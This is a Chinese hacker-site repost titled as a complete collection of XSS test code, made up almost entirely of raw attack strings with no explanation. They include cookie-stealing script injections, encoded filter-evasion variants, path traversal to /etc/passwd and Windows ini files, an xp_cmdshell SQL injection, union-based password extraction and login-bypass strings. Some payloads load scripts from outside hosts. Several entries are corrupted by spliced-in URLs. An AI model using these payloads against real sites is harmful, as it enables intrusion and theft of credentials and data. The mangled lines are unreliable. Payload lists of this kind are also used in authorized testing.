<div>'><script>alert(document.cookie)</script></div><div>='><script>alert(document.cookie)</script></div><div><script>alert(document.cookie)</script></div><div><script>alert(vulnerable)</script></div><div>%3Cscript%3Ealert('XSS')%3C/script%3E</div><div><script>alert('XSS')</script></div><div><img src="javascript:alert('XSS')"></div><div>%0a%0a<script>alert(\"Vulnerable\")</script>.jsp</div><div>%22%3cscript%3ealert(%22xss%22)%3c/script%3e</div><div>%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd</div><div>%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini</div><div>%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e</div><div>%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e</div><div>%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html</div><div>%3f.jsp</div><div>%3f.jsp</div><div><script>alert('Vulnerable');</script></div><div><script>alert('Vulnerable')</script></div><div>?sql_debug=1</div><div>a%5c.aspx</div><div>a.jsp/<script>alert('Vulnerable')</script></div><div>a/</div><div>a?<script>alert('Vulnerable')</script></div><div>"><script>alert('Vulnerable')</script></div><div>';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&</div><div>%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E</div><div>%3Cscript%3Ealert(document. domain);%3C/script%3E&</div><div>%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=</div><div>1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=</div><div>https://www.cnblogs.com/https://www.cnblogs.com/https://www.cnblogs.com/https://www.cnblogs.com/etc/passwd</div><div>..\..\..\..\..\..\..\..\windows\system.ini</div><div>\..\..\..\..\..\..\..\..\windows\system.ini</div><div>'';!--"<XSS>=&{()}</div><div><IMG src="javascript:alert('XSS');"></div><div><IMG src=javascript:alert('XSS')></div><div><IMG src=JaVaScRiPt:alert('XSS')></div><div><IMG src=JaVaScRiPt:alert("XSS")></div><div><IMG src=javascript:alert('XSS')></div><div><IMG src=javascript:alert('XSS')></div><div><IMG src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29></div><div><IMG src="jav ascript:alert('XSS');"></div><div><IMG src="jav ascript:alert('XSS');"></div><div><IMG src="jav ascript:alert('XSS');"></div><div>"<IMG src=java\0script:alert(\"XSS\")>";' > out</div><div><IMG src=" javascript:alert('XSS');"></div><div><SCRIPT>a=/XSS/alert(a.source)</SCRIPT></div><div><BODY BACKGROUND="javascript:alert('XSS')"></div><div><BODY ONLOAD=alert('XSS')></div><div><IMG DYNSRC="javascript:alert('XSS')"></div><div><IMG LOWSRC="javascript:alert('XSS')"></div><div><BGSOUND src="javascript:alert('XSS');"></div><div><br size="&{alert('XSS')}"></div><div><LAYER src="https://xss.ha.ckers.org/a.js"></layer></div><div><LINK REL="stylesheet" href="javascript:alert('XSS');"></div><div><IMG src='vbscript:msgbox("XSS")'></div><div><IMG src="mocha:
<pre class="">"></pre>
</div><div></div><div><div><div style="background-image:url(javascript:alert('XSS'));"></div><div><div style="behaviour:url('https://www.how-to-hack.org/exploit.html');"></div><div><div style="width:expression(alert('XSS'));"></div><div>
<style>@im\port'\ja\vasc\ript:alert("XSS")';</style>
</div><div><img style="xss:expre\ssion(alert("" /></div><div>
<style type="text/javascript">alert('XSS');</style>
</div><div>
<style type="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</style>
<a class="XSS"></a></div><div>
<style type="text/css">BODY{background:url("javascript:alert('XSS')")}</style>
</div><div><base href="javascript:alert('XSS');//" /></div><div>getURL("javascript:alert('XSS')")</div><div>a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);</div><div><xml src="javascript:alert('XSS');"></xml></div><div>"> <"</div><div><div></div><div></div><div></div><div></div><div>PT src="https://xss.ha.ckers.org/a.js"></div><div><a href="https://www.gohttps://www.google.com/ogle.com"></a>link</div><div>admin'--</div><div>' or 0=0 --</div><div>" or 0=0 --</div><div>or 0=0 --</div><div>' or 0=0 #</div><div>" or 0=0 #</div><div>or 0=0 #</div><div>' or 'x'='x</div><div>" or "x"="x</div><div>') or ('x'='x</div><div>' or 1=1--</div><div>" or 1=1--</div><div>or 1=1--</div><div>' or a=a--</div><div>" or "a"="a</div><div>') or ('a'='a</div><div>") or ("a"="a</div><div>hi" or "a"="a</div><div>hi" or 1=1 --</div><div>hi' or 1=1 --</div><div>hi' or 'a'='a</div><div>hi') or ('a'='a</div><div>hi") or ("a"="a</div></div></div></div></div><table background="javascript:alert('XSS')"></table></div>
本文标题:XSS跨站测试代码大全
本文作者:1937cn丶Kender
本文来自:蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t688-1.html
XSS跨站测试代码大全
666